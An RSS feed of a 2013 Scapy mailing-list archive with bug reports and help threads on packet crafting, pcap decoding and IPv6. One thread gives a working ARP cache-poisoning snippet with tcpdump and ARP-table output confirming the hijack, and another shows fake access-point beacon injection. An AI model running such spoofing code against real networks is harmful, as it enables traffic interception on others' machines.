<?xml version="1.0" encoding="UTF-8"?>
<rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns="http://purl.org/rss/1.0/" xmlns:taxo="http://purl.org/rss/1.0/modules/taxonomy/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:syn="http://purl.org/rss/1.0/modules/syndication/" xmlns:admin="http://webns.net/mvcb/">
  <channel rdf:about="http://blog.gmane.org/gmane.comp.security.scapy.general">
    <title>gmane.comp.security.scapy.general</title>
    <link>http://blog.gmane.org/gmane.comp.security.scapy.general</link>
    <description/>
    <syn:updatePeriod>hourly</syn:updatePeriod>
    <syn:updateFrequency>1</syn:updateFrequency>
    <syn:updateBase>1901-01-01T00:00+00:00</syn:updateBase>
    <items>
      <rdf:Seq>
        <rdf:li rdf:resource="http://permalink.gmane.org/gmane.comp.security.scapy.general/4828"/>
        <rdf:li rdf:resource="http://permalink.gmane.org/gmane.comp.security.scapy.general/4827"/>
        <rdf:li rdf:resource="http://permalink.gmane.org/gmane.comp.security.scapy.general/4826"/>
        <rdf:li rdf:resource="http://permalink.gmane.org/gmane.comp.security.scapy.general/4825"/>
        <rdf:li rdf:resource="http://permalink.gmane.org/gmane.comp.security.scapy.general/4824"/>
        <rdf:li rdf:resource="http://permalink.gmane.org/gmane.comp.security.scapy.general/4823"/>
        <rdf:li rdf:resource="http://permalink.gmane.org/gmane.comp.security.scapy.general/4822"/>
        <rdf:li rdf:resource="http://permalink.gmane.org/gmane.comp.security.scapy.general/4821"/>
        <rdf:li rdf:resource="http://permalink.gmane.org/gmane.comp.security.scapy.general/4820"/>
        <rdf:li rdf:resource="http://permalink.gmane.org/gmane.comp.security.scapy.general/4819"/>
        <rdf:li rdf:resource="http://permalink.gmane.org/gmane.comp.security.scapy.general/4818"/>
        <rdf:li rdf:resource="http://permalink.gmane.org/gmane.comp.security.scapy.general/4817"/>
        <rdf:li rdf:resource="http://permalink.gmane.org/gmane.comp.security.scapy.general/4816"/>
        <rdf:li rdf:resource="http://permalink.gmane.org/gmane.comp.security.scapy.general/4815"/>
        <rdf:li rdf:resource="http://permalink.gmane.org/gmane.comp.security.scapy.general/4814"/>
        <rdf:li rdf:resource="http://permalink.gmane.org/gmane.comp.security.scapy.general/4813"/>
        <rdf:li rdf:resource="http://permalink.gmane.org/gmane.comp.security.scapy.general/4812"/>
        <rdf:li rdf:resource="http://permalink.gmane.org/gmane.comp.security.scapy.general/4811"/>
        <rdf:li rdf:resource="http://permalink.gmane.org/gmane.comp.security.scapy.general/4810"/>
        <rdf:li rdf:resource="http://permalink.gmane.org/gmane.comp.security.scapy.general/4809"/>
      </rdf:Seq>
    </items>
    <image rdf:resource="http://gmane.org/img/gmane-25t.png"/>
    <textinput rdf:resource=""/>
  </channel>
  <image rdf:about="http://gmane.org/img/gmane-25t.png">
    <title>Gmane</title>
    <url>http://gmane.org/img/gmane-25t.png</url>
    <link>http://gmane.org</link>
  </image>
  <item rdf:about="http://permalink.gmane.org/gmane.comp.security.scapy.general/4828">
    <title>[Scapy][bug]Memory leak in sendp() function</title>
    <link>http://permalink.gmane.org/gmane.comp.security.scapy.general/4828</link>
    <description>&lt;pre&gt;Hi!

Great thx from happy Scapy user! :)

I am experiencing a problem with memory leak(s) in the sendp() function (I
suppose): sending more than 30 000 packets with sendp() causes FreeBSD to
kill the Python process due to its large size in memory (over 3 Gb!).
Please fix it! :(

I wrote a short test with some debug information - it tries to send
10000000 packets with sendp(). FreeBSD 8.2+ x86 (scapy 2.2.0, 2.1.1)
fails at approximately the 30 000th packet. Here it is:
&amp;lt;test begin&amp;gt;
#! /usr/bin/env python
# -*- coding: utf-8 -*-

from scapy.all import *
from scapy.layers.inet import IP, TCP, UDP, ICMP
from scapy.layers.sctp import SCTP
from commands import *

import gc
import pdb

def printAllGcObjs():
   i = 0
   sum = 0
   for obj in gc.get_objects():
     i = i + 1
     curBytes = sys.getsizeof(obj)
     sum = sum + curBytes
     print('\n\nObject #' + str(i) + ' (' + str(curBytes) + ' bytes, all elements by now are at ' + str(sum) + ' bytes):')
     #print obj # Informative, but unsafe: scapy may break this by throwing "*** Type error bla-bla-bla...".
   print i

port = 1024
counter = 0
counter_to_print = 1
while port &amp;lt; 10000000:
   print('\n\n\n\n                                            Packet #' + str(counter_to_print) + '\n\n\n')
   counter_to_print = counter_to_print + 1
   if port == 65534:
     port = 1024
   pkt_A_TCP_start1 = Ether(src="00:0c:29:1e:b4:15", 
dst="00:0c:29:1e:b4:10") / IP(version=4L, id=1000, src="10.0.0.1", 
dst="10.0.0.2") / TCP(sport=1027, dport=port, seq=0x0)
   sendp(pkt_A_TCP_start1, iface='em0', verbose=0)
   del(pkt_A_TCP_start1)
   port=port+1
   counter = counter + 1
   if counter == 10000:
     text = getoutput('top -S')
     print text
     print gc.garbage
     gc.collect()
     print gc.garbage
     text = getoutput('top -S')
     print text
     #time.sleep(10)
     counter = 0
     printAllGcObjs()
     pdb.set_trace()
&amp;lt;test end&amp;gt;

I appreciate what you are doing and have a hope that you will pay 
attention to my request!


P.S. I can neither log in nor register at trac.secdev.org/scapy - I'd
rather post this bug as a ticket there.

--
Best regards,
Stepan Bajburtyan

stepan.bajburtyan&amp;lt; at &amp;gt;gmail.com

---------------------------------------------------------------------
To unsubscribe, send a mail to scapy.ml-unsubscribe&amp;lt; at &amp;gt;secdev.org


&lt;/pre&gt;</description>
    <dc:creator>Stepan B.</dc:creator>
    <dc:date>2013-05-20T20:43:42</dc:date>
  </item>
  <item rdf:about="http://permalink.gmane.org/gmane.comp.security.scapy.general/4827">
    <title>Re: Re: Decoding IPv6/sixlowpan problem</title>
    <link>http://permalink.gmane.org/gmane.comp.security.scapy.general/4827</link>
    <description>&lt;pre&gt;

Thank you, Philippe! This works now!!

&lt;/pre&gt;</description>
    <dc:creator>Bruce Barnett</dc:creator>
    <dc:date>2013-05-13T15:18:49</dc:date>
  </item>
  <item rdf:about="http://permalink.gmane.org/gmane.comp.security.scapy.general/4826">
    <title>Re: Re: Decoding IPv6/sixlowpan problem</title>
    <link>http://permalink.gmane.org/gmane.comp.security.scapy.general/4826</link>
    <description>&lt;pre&gt;

If you do that in sample.mysummary(), then self is sample,
self.underlayer is UDP and self.underlayer.underlayer is IPv6. Hence:

self.underlayer.underlayer.sprintf("UDP %IPv6.src%:%UDP.sport% ...)

&lt;/pre&gt;</description>
    <dc:creator>Philippe Biondi</dc:creator>
    <dc:date>2013-05-11T22:44:55</dc:date>
  </item>
  <item rdf:about="http://permalink.gmane.org/gmane.comp.security.scapy.general/4825">
    <title>Re: Decoding IPv6/sixlowpan problems exe</title>
    <link>http://permalink.gmane.org/gmane.comp.security.scapy.general/4825</link>
    <description>&lt;pre&gt;Fveverdedd

Sent from my iPhone

On May 11, 2013, at 2:30 PM, Bruce Barnett &amp;lt;grymoire&amp;lt; at &amp;gt;gmail.com&amp;gt; wrote:


&lt;/pre&gt;</description>
    <dc:creator>Carlos Perez</dc:creator>
    <dc:date>2013-05-11T18:57:44</dc:date>
  </item>
  <item rdf:about="http://permalink.gmane.org/gmane.comp.security.scapy.general/4824">
    <title>Re: Re: Decoding IPv6/sixlowpan problem</title>
    <link>http://permalink.gmane.org/gmane.comp.security.scapy.general/4824</link>
    <description>&lt;pre&gt;
Yes, I understand.  As I said, I also tried to use the IP field names
to get the IP addresses, i.e

self.underlayer.sprintf("UDP %IP.src%:%UDP.sport% %IP.dst%:%UDP.dport% sample")
 I've also tried

self.underlayer.sprintf("UDP %IPv6.src%:%UDP.sport%
%IPv6.dst%:%UDP.dport% sample")

And that doesn't work either. I've tried to debug this, and find out
what I am doing wrong, but I'm not making much progress.

&lt;/pre&gt;</description>
    <dc:creator>Bruce Barnett</dc:creator>
    <dc:date>2013-05-11T18:40:21</dc:date>
  </item>
  <item rdf:about="http://permalink.gmane.org/gmane.comp.security.scapy.general/4823">
    <title>Re: Decoding IPv6/sixlowpan problem</title>
    <link>http://permalink.gmane.org/gmane.comp.security.scapy.general/4823</link>
    <description>&lt;pre&gt;
I did a tcpdump capture on a 802.15.4/6LoWPAN wireless network, on the
device with the radio that was sending/receiving the data.
The packet capture type was "Raw IP" - apparently the implementation
didn't capture any frame information, so it stored it without this
data.

But the IP version in the packet is  6, not 4, so the packet should be
decoded as IPv6.
Wireshark and tcpdump both decode the packet as IPv6. Scapy decodes it as IPv4.

&lt;/pre&gt;</description>
    <dc:creator>Bruce Barnett</dc:creator>
    <dc:date>2013-05-11T18:30:05</dc:date>
  </item>
  <item rdf:about="http://permalink.gmane.org/gmane.comp.security.scapy.general/4822">
    <title>Re: Re: Decoding IPv6/sixlowpan problem</title>
    <link>http://permalink.gmane.org/gmane.comp.security.scapy.general/4822</link>
    <description>&lt;pre&gt;

UDP does not have src or dst fields. They lie in the IPv6 layer. Note
that UDP's mysummary() method uses self.underlayer to access those
values.

&lt;/pre&gt;</description>
    <dc:creator>Philippe Biondi</dc:creator>
    <dc:date>2013-05-08T23:01:56</dc:date>
  </item>
  <item rdf:about="http://permalink.gmane.org/gmane.comp.security.scapy.general/4821">
    <title>Re: Decoding IPv6/sixlowpan problem</title>
    <link>http://permalink.gmane.org/gmane.comp.security.scapy.general/4821</link>
    <description>&lt;pre&gt;

[...]


Where does the packet come from ? A pcap ?
Did you have any warning saying that the linktype was unknown ?


&lt;/pre&gt;</description>
    <dc:creator>Philippe Biondi</dc:creator>
    <dc:date>2013-05-08T22:58:04</dc:date>
  </item>
  <item rdf:about="http://permalink.gmane.org/gmane.comp.security.scapy.general/4820">
    <title>RE: How to inject 802.11 frames on FreeBSD</title>
    <link>http://permalink.gmane.org/gmane.comp.security.scapy.general/4820</link>
    <description>&lt;pre&gt;Hi all,


Could somebody be so kind to save this http://pastebin.com/rX5RGmvJ as fakeap.py and execute it using the command

# strace python fakeap.py |&amp;amp; tee strace.out

and share the output? You will probably have to replace the |&amp;amp; part on linux to make it redirect stderr to the file. It doesn't matter which OS, as long as you're confident that your wireless radio is injecting successfully.

Setting the interface is described here http://www.secdev.org/projects/scapy/doc/usage.html#wireless-frame-injection 


Thanks,

Mark

From: mark_moes&amp;lt; at &amp;gt;hotmail.com
To: scapy.ml&amp;lt; at &amp;gt;secdev.org
Date: Thu, 25 Apr 2013 13:42:00 +0200
Subject: [scapy.ml] How to inject 802.11 frames on FreeBSD




I already posted this same question on stackoverflow http://stackoverflow.com/questions/16212208/how-to-inject-802-11-frames-with-scapy-on-freebsd but I'll just copy the whole text.


On a FreeBSD 8.1 machine I am trying to inject 802.11 frames with Scapy 2.2.0 as described in the documentation's example: http://www.secdev.org/projects/scapy/doc/usage.html#wireless-frame-injection. I installed it from a precompiled FreeBSD package.

This is how I entered it in Scapy's console:

    def doit(intf):
        sendp(Dot11(addr1="ff:ff:ff:ff:ff:ff",addr2=RandMAC(),addr3=RandMAC())/
          Dot11Beacon(cap="ESS")/
          Dot11Elt(ID="SSID",info='I should see this')/
          Dot11Elt(ID="Rates",info='\x82\x84\x0b\x16')/
          Dot11Elt(ID="DSset",info="\x03")/
          Dot11Elt(ID="TIM",info="\x00\x01\x00\x00"),iface=intf,loop=1)

I have created interfaces in the following ways (and started them by issuing `ifconfig wlanx up`):

    ifconfig wlan create wlandev ath0 wlanmode monitor
    wlan1
    ifconfig wlan create wlandev ath0 wlanmode hostapd
    wlan2

I checked on both my smartphone and laptop and no sign of a new SSID, even though it says that it sent a bunch of packets. Then again, I don't even need to start the interfaces, it will still tell me that it sent the packets.


According to source the sendp() function does the following:

    # scapy/sendrecv.py:259
    __gen_send(conf.L2socket(iface=iface, *args, **kargs), x, inter=inter, loop=loop, count=count, verbose=verbose, realtime=realtime)

    # scapy/arch/linux.py:401
    class L2Socket(SuperSocket):
        desc = "read/write packets at layer 2 using Linux PF_PACKET sockets"
        def __init__(self, iface = None, type = ETH_P_ALL, filter=None, nofilter=0):
            if iface is None:
                iface = conf.iface
            self.ins = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(type))

I'm thinking that FreeBSD sockets do not support the AF_PACKET parameter (see http://www.freebsd.org/cgi/man.cgi?query=socket&amp;amp;apropos=0&amp;amp;sektion=0&amp;amp;manpath=FreeBSD%208.1-RELEASE&amp;amp;arch=default&amp;amp;format=html), but that's just a wild guess.



              &lt;/pre&gt;</description>
    <dc:creator>Mark Moes</dc:creator>
    <dc:date>2013-05-07T18:06:24</dc:date>
  </item>
  <item rdf:about="http://permalink.gmane.org/gmane.comp.security.scapy.general/4819">
    <title>Documentation error in build_dissect.rst</title>
    <link>http://permalink.gmane.org/gmane.comp.security.scapy.general/4819</link>
    <description>&lt;pre&gt;In the file  scapy-com/scapy/doc/build_dissect.rst is the code:


        def m2i(self, pkt, x):
            if s is None:
                return None, 0
            return str2vlenq(x)[1]

"s" is undefined.

&lt;/pre&gt;</description>
    <dc:creator>Bruce Barnett</dc:creator>
    <dc:date>2013-05-02T17:22:50</dc:date>
  </item>
  <item rdf:about="http://permalink.gmane.org/gmane.comp.security.scapy.general/4818">
    <title>Bug: Scapy-com does not properly decode IPv6 packets when the IP version == 6</title>
    <link>http://permalink.gmane.org/gmane.comp.security.scapy.general/4818</link>
    <description>&lt;pre&gt;When given an IPv6 packet trace, and the following code
    a=rdpcap("ipv6.pcap")
    print hexdump(a[1])
    print a[1].show()

scapy decodes it as IPv4:

0000   60 00 00 00 00 40 3A FF  FE 80 00 00 00 00 00 00   `....@:.........
0010   00 00 00 00 00 00 00 00  FF 02 00 00 00 00 00 00   ................
0020   00 00 00 00 00 00 00 01  86 00 8D 1D 40 00 00 00   ............@...
0030   00 00 00 00 00 00 00 00  01 01 00 00 00 00 00 00   ................
0040   05 01 00 00 00 00 05 DC  03 04 40 E0 00 00 03 20   ..........@....
0050   00 00 01 90 00 00 00 00  20 01 04 70 1F 15 16 EA   ........ ..p....
0060   00 00 00 00 00 00 00 00                            ........
None
###[ IP ]###
  version   = 6
  ihl       = 0
  tos       = 0x00
  len       = 0
  id        = 64
  flags     = MF
  frag      = 6911
  ttl       = 254
  proto     = 128
  chksum    = 0x00
  src       = 0.0.0.0
  dst       = 0.0.0.0
  \options   \
###[ Padding ]###
     load      = '\x00\x00\x00\x00\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x86\x00\x8d\x1d@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x01\x00\x00\x00\x00\x00\x00\x05\x01\x00\x00\x00\x00\x05\xdc\x03\x04@\xe0\x00\x00\x03 \x00\x00\x01\x90\x00\x00\x00\x00 \x01\x04p\x1f\x15\x16\xea\x00\x00\x00\x00\x00\x00\x00\x00'
None

Clearly the version of the packet is IPv6. tcpdump and Wireshark
decode it properly.


Workaround:
     conf.l2types.register(101, IPv6)

and the .show now prints
###[ IPv6 ]###
  version   = 6
  tc        = 0
  fl        = 0
  plen      = 64
  nh        = ICMPv6
  hlim      = 255
  src       = fe80::
  dst       = ff02::1
###[ ICMPv6 Neighbor Discovery - Router Advertisement ]###
     type      = Router Advertisement
     code      = 0
     cksum     = 0x8d1d
     chlim     = 64
     M         = 0
     O         = 0
     H         = 0
     prf       = Medium (default)
     P         = 0
     res       = 0
     routerlifetime= 0
     reachabletime= 0
     retranstimer= 0
###[ ICMPv6 Neighbor Discovery Option - Source Link-Layer Address ]###
        type      = 1
        len       = 1
        lladdr    = 00:00:00:00:00:00
###[ ICMPv6 Neighbor Discovery Option - MTU ]###
           type      = 5
           len       = 1
           res       = 0x00
           mtu       = 1500
###[ ICMPv6 Neighbor Discovery Option - Prefix Information ]###
              type      = 3
              len       = 4
              prefixlen = 64
              L         = 1
              A         = 1
              R         = 1
              res1      = 0
              validlifetime= 0x0320
              preferredlifetime= 0x0190
              res2      = 0x00
              prefix    = 2001:470:1f15:16ea::
None

&lt;/pre&gt;</description>
    <dc:creator>Bruce Barnett</dc:creator>
    <dc:date>2013-05-02T15:03:50</dc:date>
  </item>
  <item rdf:about="http://permalink.gmane.org/gmane.comp.security.scapy.general/4817">
    <title>Re: Decoding IPv6/sixlowpan problem</title>
    <link>http://permalink.gmane.org/gmane.comp.security.scapy.general/4817</link>
    <description>&lt;pre&gt;

I'm not sure this was right. I've also used this:
conf.l2types.register(101, SixLoWPAN)

But now I have another problem. I'm creating a new layer on top of the
6LoWPAN layer. Here is the code, called sample.py
----------------------------------------
from scapy.all import *
import socket
import struct
from scapy.layers.inet import  *
from scapy.layers.inet6 import  *
from scapy.layers.sixlowpan import *
class sample(Packet):
    name = "sample"
    def mysummary(self):
        if isinstance(self.underlayer, UDP):
            return self.underlayer.sprintf("UDP %UDP.src%:%UDP.sport%
        else:
            return "sample"

bind_layers( UDP, sample, sport=5683 )
bind_layers( UDP, sample, dport=5683 )
--------------------------------------------------------
Now when I try to decode this packet, and print the UDP (or IPv6)
source and address, I get "??" instead of the real value:

SixLoWPAN / LoWPAN_IPHC / IPv6 / UDP / UDP ??:5683 &amp;gt; ??:61631 sample / Raw

but if I don't import my class, I get the default (correct) behavior:
SixLoWPAN / LoWPAN_IPHC / IPv6 / UDP 2001:470:1f15:16ea::acdc:5683 &amp;gt;
2001:470:1f15:16ea:202:304:506:709:61631 / Raw

Any suggestions?

&lt;/pre&gt;</description>
    <dc:creator>Bruce Barnett</dc:creator>
    <dc:date>2013-05-01T18:20:58</dc:date>
  </item>
  <item rdf:about="http://permalink.gmane.org/gmane.comp.security.scapy.general/4816">
    <title>Re: byte array from raw packet data</title>
    <link>http://permalink.gmane.org/gmane.comp.security.scapy.general/4816</link>
    <description>&lt;pre&gt;Thanks. Let me see if I understand--in packet[0] I have the first packet,
still in pcap form. Then chexdump converts to a string and then converts
characters to bytes:

def chexdump(x):
    x=str(x)
    print ", ".join(map(lambda x: "%#04x"%ord(x), x))


I don't need to print them, just set them up in an array for later
processing, but I suppose I could use something like this to assign the
byte values to an array and then process through the rest of the pcap file.
Does this seem like a reasonable approach?

Thanks,

Kevin




On Fri, Apr 26, 2013 at 7:13 AM, Bruce Barnett &amp;lt;grymoire&amp;lt; at &amp;gt;gmail.com&amp;gt; wrote:



&lt;/pre&gt;</description>
    <dc:creator>Kevin Ross</dc:creator>
    <dc:date>2013-04-30T05:05:49</dc:date>
  </item>
  <item rdf:about="http://permalink.gmane.org/gmane.comp.security.scapy.general/4815">
    <title>Re: Using fragment6 with layer2 commands</title>
    <link>http://permalink.gmane.org/gmane.comp.security.scapy.general/4815</link>
    <description>&lt;pre&gt;Yes, I've sent fragmented IPv6 packets using sendp.


On Mon, Apr 29, 2013 at 5:15 PM, Antonios Atlasis &amp;lt;
antonios.atlasis&amp;lt; at &amp;gt;gmail.com&amp;gt; wrote:

&lt;/pre&gt;</description>
    <dc:creator>Nathan Michaels</dc:creator>
    <dc:date>2013-04-29T21:33:34</dc:date>
  </item>
  <item rdf:about="http://permalink.gmane.org/gmane.comp.security.scapy.general/4814">
    <title>Using fragment6 with layer2 commands</title>
    <link>http://permalink.gmane.org/gmane.comp.security.scapy.general/4814</link>
    <description>&lt;pre&gt;Hi,

I know that in order to fragment IPv6 packets, you can use fragment6.
However, all the examples that I have found are used with the send (layer
3) command.

Is it possible to use fragment6 with a layer 2 command, for example
sendp or srp? For example, something like
sendp(Ether()/fragment6(...),iface)?

Thanks in advance

Antonios
&lt;/pre&gt;</description>
    <dc:creator>Antonios Atlasis</dc:creator>
    <dc:date>2013-04-29T21:15:49</dc:date>
  </item>
  <item rdf:about="http://permalink.gmane.org/gmane.comp.security.scapy.general/4813">
    <title>Re: byte array from raw packet data</title>
    <link>http://permalink.gmane.org/gmane.comp.security.scapy.general/4813</link>
    <description>&lt;pre&gt;


Try the scapy/utils.py hexdump function, or perhaps chexdump(), i.e.

packets=rdpcap("file.pcap")

print chexdump(packets[0])

&lt;/pre&gt;</description>
    <dc:creator>Bruce Barnett</dc:creator>
    <dc:date>2013-04-26T14:13:32</dc:date>
  </item>
  <item rdf:about="http://permalink.gmane.org/gmane.comp.security.scapy.general/4812">
    <title>Re: Decoding IPv6/sixlowpan problem</title>
    <link>http://permalink.gmane.org/gmane.comp.security.scapy.general/4812</link>
    <description>&lt;pre&gt;
I found a work-around.
Here's one way to "fix" the issue - force the linktype to be IPv6:

conf.l2types.register(101, IPv6)

&lt;/pre&gt;</description>
    <dc:creator>Bruce Barnett</dc:creator>
    <dc:date>2013-04-26T14:05:18</dc:date>
  </item>
  <item rdf:about="http://permalink.gmane.org/gmane.comp.security.scapy.general/4811">
    <title>byte array from raw packet data</title>
    <link>http://permalink.gmane.org/gmane.comp.security.scapy.general/4811</link>
    <description>&lt;pre&gt;Hello all,

I'm new to Scapy and I'm having trouble understanding how to do something
that is probably pretty simple. I want to process a pcap file and get the
raw packet data into an array of bytes. This is in order to do statistical
processing of the bytes to try to look for attacks in a manner similar to a
network-based IDS. If anyone has a suggestion I would appreciate it.

Thanks,

Kevin

&lt;/pre&gt;</description>
    <dc:creator>Kevin Ross</dc:creator>
    <dc:date>2013-04-26T04:30:39</dc:date>
  </item>
  <item rdf:about="http://permalink.gmane.org/gmane.comp.security.scapy.general/4810">
    <title>Re: ARP Cache Poisoning</title>
    <link>http://permalink.gmane.org/gmane.comp.security.scapy.general/4810</link>
    <description>&lt;pre&gt;I edited the source to send and made a mistake =] ...
src=getmacbyip(me) is actually src=getmacbyip(me1) , where me1 is my IP.
Using src=get_if_hwaddr(iface) is more elegant I know



2013/4/25 Otavio Augusto &amp;lt;otavioarj&amp;lt; at &amp;gt;gmail.com&amp;gt;



&lt;/pre&gt;</description>
    <dc:creator>Otavio Augusto</dc:creator>
    <dc:date>2013-04-26T00:58:36</dc:date>
  </item>
  <item rdf:about="http://permalink.gmane.org/gmane.comp.security.scapy.general/4809">
    <title>Fwd: ARP Cache Poisoning</title>
    <link>http://permalink.gmane.org/gmane.comp.security.scapy.general/4809</link>
    <description>&lt;pre&gt;Hi,

Am I missing something about ARP cache poisoning? I tested the built-in
function arpcachepoison and it appears to be sending only an ARP ping.

When I run that function, this is caught by tcpdump:
21:18:28.435348 ARP, Request who-has 192.168.1.1 tell 192.168.1.4, length 28
    0x0000:  0001 0800 0604 0001 0800 2721 75ed c0a8
    0x0010:  0104 0000 0000 0000 c0a8 0101
21:18:28.435692 ARP, Reply 192.168.1.1 is-at c4:3d:c7:4b:53:ac (oui Unknown), length 46
    0x0000:  0001 0800 0604 0002 c43d c74b 53ac c0a8
    0x0010:  0101 0800 2721 75ed c0a8 0104 0000 0000
    0x0020:  0000 0000 0000 0000 0000 8c81 70b8

So it's just forging a request from 192.168.1.4 asking who is the
router. When checking the 192.168.1.4 ARP cache, this is there:

Interface: 192.168.1.4 --- 0xd
  Internet Address      Physical Address      Type
  192.168.1.1           c4-3d-c7-4b-53-ac     dynamic
  192.168.1.255         ff-ff-ff-ff-ff-ff                static

Actually the gateway MAC. So.. ? Maybe I didn't understand the prototype of
that function, a missing parameter? =]

After using that:
poison = Ether(dst=getmacbyip(target), src=getmacbyip(me))/ARP(op="is-at", psrc=me, pdst=target)
sendp(poison)


tcpdump catches this:
21:28:34.023229 ARP, Reply 192.168.1.1 is-at 00:1e:68:92:ad:68 (oui Unknown), length 28
    0x0000:  0001 0800 0604 0002 001e 6892 ad68 c0a8
    0x0010:  0101 0000 0000 0000 c0a8 0104


And arp cache on 192.168.1.4 is:

Interface: 192.168.1.4 --- 0xd
  Internet Address      Physical Address      Type
  192.168.1.1           00-1e-68-92-ad-68     dynamic
  192.168.1.3           00-1e-68-92-ad-68     dynamic
  192.168.1.255         ff-ff-ff-ff-ff-ff                static

Here the gateway has my MAC now, so a successful ARP poisoning attack. For
some reason there is tons of code on the internet reproducing that "who-has"
behavior, so maybe I'm missing something... am I?

Best



&lt;/pre&gt;</description>
    <dc:creator>Otavio Augusto</dc:creator>
    <dc:date>2013-04-26T00:46:42</dc:date>
  </item>
  <item rdf:about="http://permalink.gmane.org/gmane.comp.security.scapy.general/4808">
    <title>RE: scapy SNMP decode doesn't recognize GAUGE32 ?</title>
    <link>http://permalink.gmane.org/gmane.comp.security.scapy.general/4808</link>
    <description>&lt;pre&gt;Looks like this has already been fixed.
I was using v2.0. Upgrading to v2.2 took care of it.

Thanks for creating scapy. It's much more straightforward to use than other packages I've worked with.



&lt;/pre&gt;</description>
    <dc:creator>Reynolds, Samuel</dc:creator>
    <dc:date>2013-04-25T18:20:19</dc:date>
  </item>
  <textinput rdf:about="http://search.gmane.org/?group=$group=gmane.comp.security.scapy.general">
    <title>Search Engine</title>
    <description>Search the mailing list at Gmane</description>
    <name>query</name>
    <link>http://search.gmane.org/?group=$group=gmane.comp.security.scapy.general</link>
  </textinput>
</rdf:RDF>
